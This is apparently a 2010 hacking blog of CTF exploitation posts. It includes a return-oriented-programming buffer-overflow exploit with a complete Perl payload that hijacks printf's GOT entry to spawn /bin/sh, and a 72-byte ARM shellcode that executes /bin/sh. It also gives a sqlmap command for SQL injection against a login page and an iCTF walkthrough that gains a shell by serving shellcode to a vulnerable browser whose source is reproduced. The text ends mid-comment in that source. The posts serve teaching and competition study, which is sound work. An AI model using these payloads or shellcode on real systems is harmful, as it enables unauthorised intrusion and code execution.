This is a brief introduction to a cool little technique of buffer overflow exploit with the following conditions: the stack is not executable, the stack address is randomized, and the libc address is also randomized. In other words, we cannot simply use return-to-stack and return-to-libc.

A vulnerable program that I am going to use is a modified version of gera's in [1]. Here, we do not have stack canary protection, but I am going to make it much harder by modifying the code a little bit: adding an exit system call, and employing stack and libc address randomization (ASLR). The modified version is shown below:

  1. #include <string.h>
  2. #include <stdlib.h>
  3. #include <stdio.h>
  4.  
  5. int func(char *msg) {
  6.     char buf[80];
  7.  
  8.     strcpy(buf,msg);
  9.     buf[0] = toupper(buf[0]);
  10.     strcpy(msg,buf);
  11.     printf("Caps: %s\n",msg);
  12.     exit(1);
  13. }
  14.  
  15. int main(int argv, char** argc) {
  16.         func(argc[1]);
  17. }


1. Vulnerability
    There is a classic strcpy vulnerability in the func function. Two consecutive strcpy calls enable us to write arbitrary values to an arbitrary address: the first strcpy overflows buf and overwrites the msg pointer, and the second strcpy then writes our data to wherever msg now points. Note that overwriting the return address of func is not enough, because func never returns: it ends with a call to exit. This is clearer if you look at the disassembled version of the program:

  1. 080484b4 <func>:
  2.  80484b4:       55                      push   %ebp
  3.  80484b5:       89 e5                   mov    %esp,%ebp
  4.  80484b7:       83 ec 58                sub    $0x58,%esp
  5.  80484ba:       8b 45 08                mov    0x8(%ebp),%eax
  6.  80484bd:       89 44 24 04             mov    %eax,0x4(%esp)
  7.  80484c1:       8d 45 b0                lea    -0x50(%ebp),%eax
  8.  80484c4:       89 04 24                mov    %eax,(%esp)
  9.  80484c7:       e8 04 ff ff ff          call   80483d0 <strcpy@plt>
  10.  80484cc:       0f b6 45 b0             movzbl -0x50(%ebp),%eax
  11.  80484d0:       0f be c0                movsbl %al,%eax
  12.  80484d3:       89 04 24                mov    %eax,(%esp)
  13.  80484d6:       e8 d5 fe ff ff          call   80483b0 <toupper@plt>
  14.  80484db:       88 45 b0                mov    %al,-0x50(%ebp)
  15.  80484de:       8d 45 b0                lea    -0x50(%ebp),%eax
  16.  80484e1:       89 44 24 04             mov    %eax,0x4(%esp)
  17.  80484e5:       8b 45 08                mov    0x8(%ebp),%eax
  18.  80484e8:       89 04 24                mov    %eax,(%esp)
  19.  80484eb:       e8 e0 fe ff ff          call   80483d0 <strcpy@plt>
  20.  80484f0:       8b 45 08                mov    0x8(%ebp),%eax
  21.  80484f3:       89 44 24 04             mov    %eax,0x4(%esp)
  22.  80484f7:       c7 04 24 00 86 04 08    movl   $0x8048600,(%esp)
  23.  80484fe:       e8 dd fe ff ff          call   80483e0 <printf@plt>
  24.  8048503:       c7 04 24 01 00 00 00    movl   $0x1,(%esp)
  25.  804850a:       e8 e1 fe ff ff          call   80483f0 <exit@plt>
  26.  
  27. 0804850f <main>:
  28.  804850f:       8d 4c 24 04             lea    0x4(%esp),%ecx
  29.  8048513:       83 e4 f0                and    $0xfffffff0,%esp
  30.  8048516:       ff 71 fc                pushl  -0x4(%ecx)
  31.  8048519:       55                      push   %ebp
  32.  804851a:       89 e5                   mov    %esp,%ebp
  33.  804851c:       51                      push   %ecx
  34.  804851d:       83 ec 14                sub    $0x14,%esp
  35.  8048520:       8b 41 04                mov    0x4(%ecx),%eax
  36.  8048523:       83 c0 04                add    $0x4,%eax
  37.  8048526:       8b 00                   mov    (%eax),%eax
  38.  8048528:       89 04 24                mov    %eax,(%esp)
  39.  804852b:       e8 84 ff ff ff          call   80484b4 <func>
  40.  8048530:       83 c4 14                add    $0x14,%esp
  41.  8048533:       59                      pop    %ecx
  42.  8048534:       5d                      pop    %ebp
  43.  8048535:       8d 61 fc                lea    -0x4(%ecx),%esp
  44.  8048538:       c3                      ret

2. Observation and Strategy
    We can only modify a single memory region, but it must not be the return address because of the exit system call. There are several possible spots including dtors and GOT. In this example, I am going to overwrite the GOT entry of the printf function. The GOT lives in the program's own writable data segment, which (for a non-PIE binary like this one) is loaded at a fixed address, so its location is not randomized.

    Now we can hijack the control flow when printf is called, so the next step is to determine where to jump. We cannot simply return to libc because its address is randomized (we are not going to use brute force here). However, we know that the code section's addresses are fixed, so we are going to use the return-oriented programming technique introduced by Hovav Shacham [2]. In this problem, we can only use the code section of this small program, so there is only a very small number of gadgets available.

   The return-oriented program that we are going to design runs as follows: 1) retrieve an address to libc's strcpy function from the GOT, 2) compute the relative address from strcpy function to system function, 3) obtain the address of the system function from the step 1 and 2, 4) set up the stack to have a pointer to "/bin/sh" string, 5) jump to the system function using indirect call (call *%eax).

3. Gadgets

    We are going to use the following 4 gadgets that we can find from the code section to perform the exploitation.

    1)
  1. 0x80485a2 <__libc_csu_init+82>: add    $0xc,%esp
  2. 0x80485a5 <__libc_csu_init+85>: pop    %ebx
  3. 0x80485a6 <__libc_csu_init+86>: pop    %esi
  4. 0x80485a7 <__libc_csu_init+87>: pop    %edi
  5. 0x80485a8 <__libc_csu_init+88>: pop    %ebp
  6. 0x80485a9 <__libc_csu_init+89>: ret

    2)
  1. 0x804838c <_init+44>:   pop    %eax
  2. 0x804838d <_init+45>:   pop    %ebx
  3. 0x804838e <_init+46>:   leave  
  4. 0x804838f <_init+47>:   ret

    3)
  1. 0x80485ce <__do_global_ctors_aux+30>:   add    0xf475fff8(%ebx),%eax
  2. 0x80485d4 <__do_global_ctors_aux+36>:   add    $0x4,%esp
  3. 0x80485d7 <__do_global_ctors_aux+39>:   pop    %ebx
  4. 0x80485d8 <__do_global_ctors_aux+40>:   pop    %ebp
  5. 0x80485d9 <__do_global_ctors_aux+41>:   ret

    4)
  1. 0x80484af <frame_dummy+31>:     call   *%eax

4. Final Exploit
     Using the above four gadgets, I introduce the following exploit. Note this exploit is not just a simple return-oriented programming exploit, there are many techniques involved:
    1) It dynamically retrieves system function's address from the GOT
    2) changes the ebp register to point to the bss section so that we can control the esp and ebp continuously.
    3) Set up the stack address to have enough space for system call.

   First, the second gadget sets up the eax and ebx values that are used in the third gadget to compute the system function's address. The result of the "add 0xf475fff8(%ebx), %eax" instruction must produce the address of system function in libc. Specifically, 0xf475fff8(%ebx) must point to the strcpy's GOT entry, so the strcpy's address in libc is added with the value in eax register.

    Changing the ebp register in the first gadget is the most tricky part. In the first gadget, we set up the ebp to point to a writable bss section (More precisely, beyond the bss section). Since the address of 0x804a2e8 is a writable region, we can set the address for ebp and esp. In the second gadget, we can set up the esp value by using the leave instruction. Thus after the second gadget, both the ebp and the esp will point to the addresses of the bss section.

    The final exploit in perl is shown below:

  1. print "\xa2\x85\x04\x08" . # First Gadget
  2. "AAAAAAAA" . # dummy
  3. "\xe8\xa2\x04\x08" . # set ebp, pointing to line 9 of this exploit string
  4. "\x8c\x83\x04\x08" . # Second gadget
  5. "\xc0\x52\xfc\xff" ."\x14\xa0\x8e\x13AAAA" . "/bin/sh;"  . "A"x48 .
  6. "\x10\xa0\x04\x08" . # GOT entry address of printf
  7. "\x30\xa0\x04\x08"x0xa0 . # dummy
  8. "\xce\x85\x04\x08" .
  9. "\x30\xa0\x04\x08"x0x2 . # dummy
  10. "\x30\xa0\x04\x08" . # dummy ebp
  11. "\xaf\x84\x04\x08" . # call *%eax
  12. "\x30\xa0\x04\x08";

I also attach the binary file for people who are interested. :)
(Download)

5. Conclusion
    There are many possible ways of bypassing ASLR protections. Here, I presented a way to apply the return-oriented programming technique in a very limited environment: small code space, randomized stack and randomized libc.
2010/05/05 22:06 2010/05/05 22:06
Posted by 차상길.

Codegate 2010

2010/03/14 16:34 / Hacking
We pwned the codegate 2010 prequalification round!

The problems were of really high quality. I had so much fun. Thanks to the people who organized this awesome competition. Since we are going to make our own write-up, I am not going to write about the problems here.

Anyway I must say that I liked this problem where there was a virtual machine program. It was really hard until we realized the hash algorithm uses tiny encryption algorithm, which has hash collision vulnerability. It was really inspiring one. Also, the sql-injection one was really funky. :)
2010/03/14 16:34 2010/03/14 16:34
Posted by 차상길.

pintool

2010/02/20 01:07 / Hacking
I started to use Pintool nowadays. Pintool is an awesome instrumentation tool for x86 and ARM.
By the way, what is instrumentation then?

Let's consider the two-line binary as below.
xor eax, eax
push eax
Okay, now we want to do something with this binary: count the number of instruction, print out binary code for each instruction, and so forth. We call this kind of job as "instrumentation". We can even do instrumentation in a basic block level, or a function level.

Now I say that this can be a powerful tool for hacking as well.

About 40~50 pages of manual is really intuitive. You can easily understand how to use it.
http://www.pintool.org/docs/31933/Pin/html/
2010/02/20 01:07 2010/02/20 01:07
Posted by 차상길.

Padocon 2010

2010/02/07 15:14 / Hacking
Padocon 2010 (http://www.padocon.org/conference2010/) CTF qualification has just finished. CMU's PPP won 3rd place. :)

The binary problems were all about the local exploitation, especially, ASLR (Address Space Layout Randomization), and "W xor X" (Address space can be used either for writing or executing, but not both).

It was really an interesting challenge for me. Also learned a lot from it. I am writing this summary to remind the attack that we performed for several problems.

We have a binary that is protected by ASLR, W xor X, and a randomized libc address. Further, we have only 8 bytes of stack space to overflow, so we can only overwrite the saved ebp and the return address. How do we attack this kind of binary?

One intuition is that we can actually check the /proc/*/maps to see which memory is writable, or executable because this is local exploitation. Thus, the strategy is to return to a certain writable address that contains three consecutive memory address that we can use as arguments for the exec, and then perform brute-force until we get to the same execv address, e.g. AAAA <usable address that contains three consecutive writable memory address> <ret to exec>. Also, we make a simple binary that change its permission and spawn "/bin/sh". Now the name of the file should be some garbage string that resides in the memory address that we found in the previous step.


2010/02/07 15:14 2010/02/07 15:14
Posted by 차상길.

Arm Shellcode

2010/01/26 00:21 / Hacking
It is hard to find a very simple ARM shellcode. So I decided to make my own ARM shellcode.

ARM is becoming more and more popular architecture as the number of smart phones and 'net books' are expanding. Don't forget! iPhone and Nokia tablets are also running on ARM. :D

So what is the most important thing to consider to generate ARM shellcode?

First, the linux system call in ARM is little bit different from the x86 system call. Namely, the system call number is stored in r7 register instead of r0 register. (eax register can be considered as r0 in ARM). Thus, the arguments are stored in r0, r1, ... in turn.

Second, we need some trick to load 32bit immediate value into a memory address in ARM. Here, I am using four sequential arm instructions to push 32bit immediate into stack. Note that the exclamation mark in ARM assembly code means that the index operation is performed before applying the real instruction. For example, str r2, [r3, #-4]!  means: store r2 value to the ptr {r3-4} and r3 = r3 -4.

With the above facts in mind, I will present my own ARM shellcode here !!
This is just a simple example, and it contains null characters. So not applicable in most of the real cases. :)

 (ARM shellcode, execute /bin/sh and call exit) (72 byte)  
 // by funkyG  
 "\x00\x00\x20\xe0\x01\x10\x21\xe0\x02\x20\x22\xe0\x04\x20\x2d\xe5\x00\xc0\x9f\xe5\x00\x00\x00\xea\x2f\x2f\x73\x68\x04\xc0\x2d\xe5\x00\xc0\x9f\xe5\x00\x00\x00\xea\x2f\x62\x69\x6e\x04\xc0\x2d\xe5\x0d\x00\xa0\xe1\x0b\x70\xa0\xe3\x00\x00\x00\xef\x00\x00\xa0\xe3\x01\x70\xa0\xe3\x00\x00\x00\xef"  
2010/01/26 00:21 2010/01/26 00:21
Posted by 차상길.

Sqlmap allows you to speed up the sql injection attack. Especially, when you try to figure out the database name, table name and stuff, this tool is extremely useful. Basically, it checks the name from the first character using ascii code comparison, and determine the full name from the hundreds of thousands of trials. It also provides many other useful options such as interactive SQL shell.

However, it is hard to get it work at the first time, so here I provide some useful examples.

Example: enumerate all the databases from "blah.com" where the login.php has SQL injection vulnerability.

./sqlmap.py --data="username=a" -u http://blah.com/login.php --method=POST -p username --prefix="blah' or not (1" --postfix=") or username='blah" --dbs
Note that --prefix and --postfix are the crucial options in most cases. This part has to be figured out by the user, since sqlmap cannot find the vulnerable strings by itself in most cases. (This is from my experience.) Once you get the right prefix and postfix, sqlmap becomes the most powerful tool.

Following is the explanation for prefix and postfix options from the sqlmap manual. (http://sqlmap.sourceforge.net/doc/README.html)

Options: --prefix and --postfix

$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_str_brackets.php?id=1" -v 3 \
-p "id" --prefix "'" --postfix "AND 'test'='test"

[...]
[hh:mm:16] [INFO] testing sql injection on GET parameter 'id' with 0 parenthesis
[hh:mm:16] [INFO] testing custom injection on GET parameter 'id'
[hh:mm:16] [TRAFFIC OUT] HTTP request:
GET /sqlmap/mysql/get_str_brackets.php?id=1%27%29%20AND%207433=7433%20AND%20
%28%27test%27=%27test HTTP/1.1
Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
Host: 192.168.1.121:80
Accept-language: en-us,en;q=0.5
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,
image/png,*/*;q=0.5
User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net)
Connection: close
[...]
[hh:mm:17] [INFO] GET parameter 'id' is custom injectable
[...]

In some circumstances the vulnerable parameter is exploitable only if the user provides a postfix to be appended to the injection payload. Another scenario where these options come handy presents itself when the user already knows that query syntax and want to detect and exploit the SQL injection by directly providing a injection payload prefix and/or postfix.

Example on a MySQL 5.0.67 target on a page where the SQL query is:

$query = "SELECT * FROM users WHERE id=('" . $_GET['id'] . "') LIMIT 0, 1";

As you can see, the injection payload for testing for custom injection is:

id=1%27%29%20AND%207433=7433%20AND%20%28%27test%27=%27test

which URL decoded is:

id=1') AND 7433=7433 AND ('test'='test

and makes the query syntatically correct to the page query:

SELECT * FROM users WHERE id=('1') AND 7433=7433 AND ('test'='test') LIMIT 0, 1

In this simple example, sqlmap could detect the SQL injection and exploit it without need to provide a custom injection payload, but sometimes in the real world application it is necessary to provide it.

Good article to read: http://www.milw0rm.com/papers/202

2010/01/19 21:22 2010/01/19 21:22
Posted by 차상길.

This post was originally posted on 12/08/2009.

It was last Friday. We (Plaid parliament of Pwning) took the 4th place in iCTF 2009. This year's iCTF was novel, because it was not attack and defense. Instead, thousands of bots were running on UCSB, and they were connecting to us according to the search rank in the web search engine they provided. All the bots were using more than 15 different versions of browsers including Perl, Python, Erlang (omg...), Java, and C++.

Since my role was binary analysis and CTF attack, I got to look at the source of almost every browser. The C++ browsers were especially interesting, and we were the only team that found the vulnerabilities in all of the C++ browsers during the competition.

Basically, we could get a shell using several overflow techniques for all the c++ binaries. Here, I will present a walk-through for the crefox-1.0 problem, which is the first-level c++ problem.

The most interesting part in this problem is that it uses dlopen function. Thus, at first glance, we thought the program uses "safe_printf" function from a certain library. However, this was just a trick! Let's look at the source code below.
/*
 * Print `fmt` followed by a newline.
 *
 * When `fmt` begins with the 21-byte marker "USESAFEPRINTFUNCTIONA", the
 * symbol "safe_printf" is looked up through dlopen(NULL)/dlsym() and called
 * with `fmt` as its string argument; otherwise plain printf() is used.
 *
 * Returns -1 only when dlopen() fails, 0 in every other case.
 *
 * NOTE: the pointer returned by dlsym() is called without a NULL check.
 */
int
print_func(const char *fmt, ...)
{

void *h;

/* lets retrieve the safe printf implementation from the library */
int (*f)(const char *, ...);

/* only the first 21 bytes of fmt are compared against the marker */
if (!strncmp("USESAFEPRINTFUNCTIONA", fmt, 21)) {
/* a NULL filename asks dlopen() for a handle on the running program itself */
h = dlopen(NULL, RTLD_LAZY);
if (!h) {
      errnonf("dlopen: %s\n", dlerror());
      return -1;
}
/* the lookup result is used as-is; nothing verifies that the symbol exists */
f = (int (*)(const char *, ...))dlsym(h, "safe_printf");
f("%s\n", fmt);
}
else
/* ok, lets follow the user will and revert to the unsafe printf :-( */
printf("%s\n", fmt);
return 0;
}
The line of strncmp function is the most tricky part in this problem !! Note that they first check some weird string and if it matches, it will load a function called "safe_printf". However, the returned function from dlsym is NULL here !

So what will happen when the function pointer f is called?

The instruction pointer will go to the address of 0x00000000. So, here, we expect the seg-fault. Right?

However, the program will not terminate. Why? Let's look at the previous part of the source code before the print_func function is called. The most important part is shown below.
ptr = mmap(NULL, size, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANON|MAP_FIXED, -1, 0);
So, they used mmap to allocate memory at the address zero! :D

If you remember that this is a browser's source code, our web server's page will be mapped to the address pointer using mmap function, only when the page starts with the string USESAFEPRINTFUNCTIONA. Thus, the instruction pointer will go the address zero, where our page source code resides in. And the source code should start with the specific string.

Now, the secret of the weird string of strncmp is unveiled. They were just a simple instruction, and even though the program flow goes to the string's address, the program will not terminate. Note that mmap used PROT_EXEC option to run the code.

Okay, so what will be the instruction for the string USESAFEPRINTFUNCTIONA ?
0x0:    push   %ebp
0x1:    push   %ebx
0x2:    inc    %ebp
0x3:    push   %ebx
0x4:    inc    %ecx
0x5:    inc    %esi
0x6:    inc    %ebp
0x7:    push   %eax
0x8:    push   %edx
...
They are just push and increment instructions ! Okay, that makes sense right? So the next step is really simple. We only need to put our shell code right after the string USESAFEPRINTFUNCTIONA. In this way, a web browser who visits our website (including the string USESAFEPRINTFUNCTIONA and shellcode in the page) will run our shellcode, and connect to our web server.

All the binary problems were really intriguing. Look at the entire source code that I attached below, and feel the trickiness of this problem. Actually, the next two versions are more tricky. I will explain them later. :D

Full source code:
/*
* iCTF Crefox browser
*
* Lorenzo ``Gigi Sullivan'' Cavallaro <sullivan@cs.ucsb.edu>
*
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <getopt.h>
#include <stdarg.h>
#include <errno.h>
#include <dlfcn.h>
#include <sys/mman.h>
#include <curl/curl.h>

#include "list.h"

#include <iostream>
#include <string>
using namespace std;

#include <htmlcxx/html/ParserDom.h>
using namespace htmlcxx;

#define MAXINPUT 8192
#define PROMPT "COMMAND>"
#define COOKIEFILE "./.cookiejar.txt"

#define VERSION "1.0.1"
#define UA "Crefox-" VERSION " (+http://ictf.cs.ucsb.edu/)"

extern char *optarg;
extern int optind, opterr, optopt;
extern char *__progname;

/* Runtime configuration; zeroed by main() and then filled by parse_options(). */
struct opts
{
/* proxy string handed to CURLOPT_PROXY; set from the -x option, else left NULL */
char *proxy;
/* interactive prompt; strdup() of the -p argument, or of PROMPT when -p is absent */
char *prompt;
/* incremented by main() when load_plugins() does not return -1 */
char plugins;
};

/* State of the most recently downloaded page. */
struct page
{
/* NUL-terminated buffer that map_page() grows as data arrives */
char *memory;
/* number of payload bytes held in memory (terminator not counted) */
size_t size;
/* mapping created by safe_move() that receives a copy of memory */
void *mmap;
/* length used for that mapping; main() passes it to munmap() */
size_t mmap_size;
};

/* One loaded plugin; instances are chained together through `list`. */
struct plugins
{
/* handle returned by dlopen() in loadlib() */
void *h;
/* strdup()'d copy of the library name given to loadlib() */
char *name;
/* list linkage; main() initialises the head with INIT_LIST_HEAD() */
struct list_head list;
};

CURL *browser_init(void);
void browser_shutdown(int, CURL *) __attribute__((noreturn));
void parse_options(int, char **, struct opts *, void *);
void split(char **, char *, int);
int uniq(char **, char *, char);
char **parse_input(char *, int *);
size_t map_page(void *, size_t, size_t, void *);
void free_args(char **);
struct plugins *loadlib(const char *);
int load_plugins(struct plugins *);
void unload_plugins(struct plugins *);
int print_func(const char *, ...);
int safe_move(struct page *);

int extract_tags(char *, char *, char *, int (*)(void *));
int print_href(void *);

void __errf(int, const char *, ...) __attribute__((noreturn));
void __errnonf(const char *, ...);

/*
 * errf(x, fmt, ...): write "ERROR:<progname>:(fatal):" to stderr, then pass
 * the message to __errf(), which prints it and exits with status x.
 */
#define errf(x, fmt, args...) \
do { \
fprintf(stderr, "ERROR:%s:(fatal):", __progname), __errf(x, fmt, ##args); \
} while (0)

/*
 * errnonf(fmt, ...): write "ERROR:<progname>:(non fatal):" to stderr, then
 * pass the message to __errnonf(), which prints it and returns.
 */
#define errnonf(fmt, args...) \
do { \
fprintf(stderr, "ERROR:%s:(non fatal):", __progname), __errnonf(fmt, ##args); \
} while (0)

/*
 * debug(fmt, ...): write "DEBUG:<progname>:" to stderr followed by the
 * printf-style message built from the arguments.
 */
#define debug(args...) \
do { \
fprintf(stderr, "DEBUG:%s:", __progname), fprintf(stderr, ##args); \
} while (0)

int
main(int argc, char **argv)
{

char errbuf[CURL_ERROR_SIZE], quit;
CURL *browser;
int res;

struct opts opts;
struct page page;
struct stat sbuf;
struct plugins plugins;

int (*output_page)(const char *, ...);

browser = browser_init();
if (!browser)
errf(1, "browser_init()\n");

memset(&page, 0, sizeof (page));
memset(&opts, 0, sizeof (opts));
parse_options(argc, argv, &opts, browser);

INIT_LIST_HEAD(&plugins.list);

res = load_plugins(&plugins);
if (res != -1) {

struct list_head *l;
struct plugins *p;
int i = 0;

opts.plugins++;

list_for_each(l, &plugins.list) {

   p = list_entry(l, struct plugins, list);
   debug("plugin[%i]:%s\n", i++, p->name);

}
}
else {
errnonf("plugins not successfully loaded\n");
}

if (opts.proxy) {
curl_easy_setopt(browser, CURLOPT_PROXY, opts.proxy);
debug("proxy: %s\n", opts.proxy);
}

curl_easy_setopt(browser, CURLOPT_USERAGENT, UA);
curl_easy_setopt(browser, CURLOPT_REFERER, "http://ictf.cs.ucsb.edu");
curl_easy_setopt(browser, CURLOPT_FOLLOWLOCATION, 1);
curl_easy_setopt(browser, CURLOPT_ERRORBUFFER, errbuf);

if (!stat(COOKIEFILE, &sbuf))
curl_easy_setopt(browser, CURLOPT_COOKIEFILE, COOKIEFILE);
curl_easy_setopt(browser, CURLOPT_COOKIEJAR, COOKIEFILE);

curl_easy_setopt(browser, CURLOPT_WRITEFUNCTION, map_page);
curl_easy_setopt(browser, CURLOPT_WRITEDATA, &page);

output_page = &print_func;

quit = 0;
while (!quit) {

char in[MAXINPUT];
int num, i;
char **args;

memset(in, 0, MAXINPUT);
memset(errbuf, 0, sizeof(errbuf));
printf("%s", opts.prompt);

if (!fgets(in, MAXINPUT, stdin)) {
   if (!errno) {
     fprintf(stderr, "\n");
     errnonf("Please use 'q' to quit the browser\n");
     continue;
   }
   errnonf("fgets(): error: %d %s\n", errno, strerror(errno));
   break;
}

args = parse_input(in, &num);
if (!args) {
   errnonf("parse_input()\n");
   continue;
}

if (num > 1)
   curl_easy_setopt(browser, CURLOPT_URL, args[1]);

if (!strcmp(args[0], "u")) {

   long code, redir;

   if (num == 2 && args[1]) {

     for (i = 0; i < num; i++)
        debug("args[%d]: %s\n", i, args[i]);

     if (page.memory) {
        free(page.memory);
        memset(&page, 0, sizeof (page));
     }

     debug("Getting URL: %s\n", args[1]);

   curl_easy_setopt(browser, CURLOPT_POST, 0);

     if (curl_easy_perform(browser))
        errnonf("URL retrieval: %s\n", errbuf);
     else {
        curl_easy_getinfo(browser, CURLINFO_RESPONSE_CODE, &code);
        debug("HTTP status: %ld\n", code);
        curl_easy_getinfo(browser, CURLINFO_REDIRECT_COUNT, &redir);
        debug("HTTP redirect #: %ld\n", redir);
     }

     if (page.memory && code == 200) {
   
        if (safe_move(&page) == -1) {
           errnonf("safe_move failed (no output can be generated)\n");
           continue;
        }

        if (output_page((const char *)page.mmap) == -1)
           printf("%s\n", (const char *)page.mmap);

        memset(page.mmap, 0, page.mmap_size);
        munmap(page.mmap, page.mmap_size);

     }
   }
   else
     errnonf("malformed 'u' request\n");

   free_args(args);
   continue;
}

if (!strcmp(args[0], "p")) {

   memset(errbuf, 0, sizeof (errbuf));

   for (i = 0; i < num; i++)
     debug("args[%d]: %s\n", i, args[i]);

   if (num == 3 && args[1] && args[2]) {

     unsigned long code;

     if (page.memory) {
        free(page.memory);
        memset(&page, 0, sizeof (page));
     }

   curl_easy_setopt(browser, CURLOPT_POST, 1);
     curl_easy_setopt(browser, CURLOPT_POSTFIELDS, args[2]);

     debug("Posting to URL: %s with data: %s\n", args[1], args[2]);

     if (curl_easy_perform(browser))
        errnonf("URL retrieval: %s\n", errbuf);
     else {
        curl_easy_getinfo(browser, CURLINFO_RESPONSE_CODE, &code);
        debug("HTTP status: %ld\n", code);
     }

     if (page.memory && code == 200)
        printf("%s\n", page.memory);
   }
   else
     errnonf("malformed 'p' request\n");

   free_args(args);
   continue;
}

if (!strcmp(args[0], "l")) {

   int res;

   res = extract_tags(page.memory, (char *)"a", (char *)"href", print_href);
   if (res == -1)
     errnonf("error while parsing/retrieving for <a> tags\n");

   free_args(args);
   continue;
}

if (!strcmp(args[0], "q")) {

   if (num != 1)
     errnonf("malformed 'q' request\n");
   else
     quit = 1;

   free_args(args);
   continue;
}

errnonf("malformed input\n");
}

unload_plugins(&plugins);

exit(0);
}

int
extract_tags(char *page, char *tagstr, char *attr, int (*callback)(void *))
{

string s_page;
HTML::ParserDom parser;
tree<HTML::Node> dom;
tree<HTML::Node>::iterator it;
tree<HTML::Node>::iterator end;
std::pair<bool, std::string> tag;
char lcase_tag[strlen(tagstr) + 1];
unsigned int i;

if (page)
s_page = string(page);
else {
errnonf("zero-length or non existing page\n");
return -1;
}

dom = parser.parseTree(s_page);
it = dom.begin();
end = dom.end();

memset(lcase_tag, 0, sizeof(lcase_tag));

for (i = 0; i < strlen(tagstr); i++)
lcase_tag[i] = tolower(tagstr[i]);

for (; it != end; ++it) {

if (it->tagName() == lcase_tag) {

   it->parseAttributes();
   tag = it->attribute(attr);

   if (tag.first)
     (void)callback(&tag.second);
}
}

return 0;
}

/*
 * extract_tags() callback: `value` points to a std::string holding one
 * attribute value, which is written to stdout on its own line.
 * Always returns 0.
 */
int
print_href(void *value)
{
    const std::string *href = (const std::string *)value;

    std::cout << *href << std::endl;
    return 0;
}

/*
 * Copy the downloaded page into a fresh anonymous mapping and record the
 * mapping in page->mmap / page->mmap_size.
 *
 * Returns 0 on success, or -1 when errno is non-zero after the mmap() call.
 *
 * NOTE: the mapping is requested readable, writable AND executable, with
 * MAP_FIXED and a NULL address, i.e. at address 0. The accompanying article
 * relies on exactly this behaviour.
 */
int
safe_move(struct page *page)
{

void *ptr;
/* page->size + 4096 rounded down to a multiple of 4096: always > page->size */
unsigned int size = (page->size + 4096) & ~4095;
/* caller's errno is preserved across this function */
int serrno = errno;

/* failure is detected through errno rather than by comparing against MAP_FAILED */
errno = 0;
ptr = mmap(NULL, size, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANON|MAP_FIXED, -1, 0);
if (errno != 0) {
/* errno is restored BEFORE printing, so the message shows the saved value */
errno = serrno;
printf("errno: %d %s\n", errno, strerror(errno));
return -1;
}
errno = serrno;

memset(ptr, 0, size);
/* copy length comes from strlen(), so the copy stops at the first NUL byte */
memcpy(ptr, page->memory, strlen(page->memory));

page->mmap = ptr;
page->mmap_size = size;

return 0;
}

/*
 * Print `fmt` followed by a newline.
 *
 * When `fmt` begins with the 21-byte marker "USESAFEPRINTFUNCTIONA", the
 * symbol "safe_printf" is looked up through dlopen(NULL)/dlsym() and called
 * with `fmt` as its string argument; otherwise plain printf() is used.
 *
 * Returns -1 only when dlopen() fails, 0 in every other case.
 *
 * NOTE: the pointer returned by dlsym() is called without a NULL check.
 */
int
print_func(const char *fmt, ...)
{

void *h;

/* lets retrieve the safe printf implementation from the library */
int (*f)(const char *, ...);

/* only the first 21 bytes of fmt are compared against the marker */
if (!strncmp("USESAFEPRINTFUNCTIONA", fmt, 21)) {
/* a NULL filename asks dlopen() for a handle on the running program itself */
h = dlopen(NULL, RTLD_LAZY);
if (!h) {
   errnonf("dlopen: %s\n", dlerror());
   return -1;
}
/* the lookup result is used as-is; nothing verifies that the symbol exists */
f = (int (*)(const char *, ...))dlsym(h, "safe_printf");
f("%s\n", fmt);
}
else
/* ok, lets follow the user will and revert to the unsafe printf :-( */
printf("%s\n", fmt);

return 0;
}

/*
 * Load the shared object `n` with dlopen(RTLD_NOW) and wrap it in a freshly
 * allocated struct plugins (handle plus a private copy of the name).
 *
 * Returns the new node, or NULL when `n` is NULL, memory runs out, or the
 * library cannot be opened. On failure nothing stays allocated: the original
 * freed the node but leaked the duplicated name, and never checked strdup().
 * The caller owns the returned node (see unload_plugins()).
 */
struct plugins *
loadlib(const char *n)
{
    struct plugins *p;

    if (!n)
        return NULL;

    p = (struct plugins *)calloc(1, sizeof(*p));
    if (!p)
        return NULL;

    p->name = strdup(n);
    if (!p->name) {
        free(p);
        return NULL;
    }

    p->h = dlopen(n, RTLD_NOW);
    if (!p->h) {
        /* release the name as well, not just the node */
        free(p->name);
        free(p);
        return NULL;
    }

    return p;
}

/*
 * Try to load the three built-in plugins, in order, and link every one that
 * loads onto phead->list.
 *
 * Returns 0 when all of them loaded, -1 when at least one did not; plugins
 * that did load stay on the list either way.
 */
int
load_plugins(struct plugins *phead)
{
    static const char *const names[] = { "libget.so", "libpost.so", "liblink.so" };
    int status = 0;
    size_t k;

    for (k = 0; k < sizeof(names) / sizeof(names[0]); k++) {
        struct plugins *plugin = loadlib(names[k]);

        if (!plugin) {
            status = -1;
            continue;
        }
        list_add(&(plugin->list), &(phead->list));
    }

    return status;
}

/*
 * Tear down every plugin linked on phead->list: unlink the node, close its
 * library handle, then free the name and the node itself.
 */
void
unload_plugins(struct plugins *phead)
{
    struct list_head *cur, *nxt;

    /* the _safe iterator is required because nodes are removed while walking */
    list_for_each_safe(cur, nxt, &(phead->list)) {
        struct plugins *plugin = list_entry(cur, struct plugins, list);

        list_del(cur);
        (void)dlclose(plugin->h);
        free(plugin->name);
        free(plugin);
    }
}

/*
 * Release a NULL-terminated argument vector: every string first, then the
 * vector itself.
 */
void
free_args(char **args)
{
    size_t idx = 0;

    while (args[idx] != NULL) {
        free(args[idx]);
        idx++;
    }

    free(args);
}

/*
 * Make stdout and stderr unbuffered, initialise libcurl globally (SSL only)
 * and create an easy handle.
 *
 * Returns the handle, or NULL when the global initialisation fails or no
 * handle could be created.
 */
CURL *
browser_init(void)
{
    CURLcode rc;

    setbuf(stdout, NULL);
    setbuf(stderr, NULL);

    rc = curl_global_init(CURL_GLOBAL_SSL);
    if (rc != CURLE_OK)
        return NULL;

    return curl_easy_init();
}

void
browser_shutdown(int exitcode, void *arg)
{
CURL *br = arg;

curl_easy_cleanup(br);
curl_global_cleanup();
exit(exitcode);
}

/*
 * Register browser_shutdown() as the exit handler for the curl handle `br`
 * and parse the command line into `opts`:
